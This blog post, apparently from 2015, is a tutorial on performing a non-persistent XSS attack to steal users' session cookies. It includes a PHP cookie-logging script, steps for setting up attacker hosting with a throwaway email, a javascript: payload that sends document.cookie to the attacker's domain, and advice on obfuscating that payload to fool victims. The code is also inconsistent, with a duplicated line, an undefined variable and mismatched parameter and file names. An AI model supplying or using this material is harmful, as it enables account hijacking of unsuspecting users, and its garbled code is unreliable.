Tuesday, March 31, 2015

A beginner's guide to XSS attack

XSS or cross site scripting is a type of a computer security vulnerability found in web applications. In XSS, a code is injected to the remote server so it can also be called as Client Side Scripting. According to statistics, 68% website on internet are open to this attack and its varieties and this became the most popularly used attack with the information security researchers in 2007.

In this type of attack, a vulnerable web application or a JavaScript is run from an unrelated website to exploit the vulnerabilities of same origin policy(it permits scripts running on pages of same origin once a page is allowed the use of system resources) of internet browsers and for this purpose various methods of code injection are used.

There are mainly two type of XSS attacks.

1. Non-persistent XSS attack

In this kind of vulnerability, attacker required the user to run a specifically crafted link so that vulnerability can be exploit when the browser runs it. The delivery method for such attack can be anything ranging from an email to a simple message on facebook. This is the more common type of XSS vulnerability present and because of this commoness it is generally rated as a beginner level XSS attack by the security researchers but even this can have dangerous outcomes.

2. Persistent XSS attack

The persistent(or stored) cross scripting attack is a very devastating attack simply because when the attack is successfully pulled off by an attacker, the provided by him is saved on the server and then it is permanently displayed on the pages that normal users land on in the normal course of browsing. The classic delivery system for such attack are the message boards where a user is allowed to post HTML formatted messages for the other users to read.

Today, we are going to have a look at how to pull off a very simple yet effective non-persistent XSS attack.

Step 1: Use a free web hosting service, like heliohost.org, x10hosting.com, 110mb.com, 000webhost.com, my3gb.com) to create a website whose domain name doesn't create much suspicion even if looked carefully. 
For the purpose of explaing, i managed to create a domain ht1234a.my3gb.com . On these websites, generally the username you provide while registration is used as a subdomain for your URL.

Advice: Don't use your regular email for this purpose as you might become a target of another attacker or a "security researcher". I made a dummy email htutorial1@gmail.com for this guide's purpose.

Step 2: Now in your computer, open notepad and write the following code in the file exactly the way it is given.

$cookie = $_GET['cookie']; 
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT']; 
$redirect = $_GET['redirect']; 
$data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n" ."Referrer: " . $referer .  $data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n" ."Referrer: " . $referer . 
"\n" ."Browser: " . $browser . "\n\n"; 
$log = "cookies.txt"; 
@chmod($log, 777); 
$f = fopen($log, 'a'); 
fwrite($f, $data); fclose($f); 
@header("Location: http://www.google.com"); 

Step 3: Save this file as index.php.

Step 4: Now go to the File Manager of your hosting service and upload this index.php file we just created to the root directory of your domain so that it looks like subdomain.hosting.com/index.php . So mine looks like ht1234a.my3gb.com/index.php .

Step 5: Now create an empty text file for the above web application to store the stolen cookies. As in the script we have used log the empty file should be log.txt . After creating it, upload it also to the root directory of the subdomain.

Now, preparation for the attack is done and all we got to do is create a crafty link for our victim to run. In the link the web application link is given as subdomain.hosting.com/index.php and so we can use ht1234a.my3gb.com/index.php for the guide purpose.

javascript: document.location = 'ht1234a.my3gb.com/index.php?isr=' .concat (escape (document.cookie));

This is the crafter link in the form of a javascript which needs to be run by our victim to execute this attack. As any keen observer might notice, the escape(document.cookie) might seem fishy. So, we can use a ASCII or Hex code to make it escape the normal eyes by using a char() function. Now, as the user won't normally understand the URL, the chances of him opening it increase a lot.

The best way to save yourself from such attacks is by only opening links from reliable sources and by carefully examining every unknown link you open.

Note: This tutorial is for educational purposes only,Use at your own risk. TheSmartHacks is not responsible for any type of loss caused due to this information!!


Post a Comment